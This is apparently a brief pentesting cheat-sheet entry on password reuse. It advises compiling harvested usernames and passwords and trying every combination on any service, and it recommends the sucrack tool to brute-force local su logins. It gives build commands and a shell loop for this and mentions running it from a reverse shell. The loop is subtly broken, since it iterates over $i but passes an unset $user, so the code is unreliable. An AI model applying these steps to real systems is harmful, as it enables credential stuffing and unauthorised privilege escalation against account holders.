Password Reuse

Whenever you see a user account or a credential, then write it down and compile a users wordlist and a passwords wordlist. You can then try out all these combinations on all services you want access to.

Note: Don't use this script to bruteforce user account passwords, it sucks


On linux, use sucrack. Link to static binary.

Building the static binary:

# Make sure you have all the libraries you need.
# This is to get rid of the "you don't have the aclocal library" error message
autoreconf -f -i
./configure --enable-static-linking

Enumerating through a users and passwords list:

for i in $(cat ./users.txt); do echo "Cracking $i"; ./sucrack -u "$user" ./passwords.txt ; done

Warning: Running sucrack may break your reverse shell a bit!

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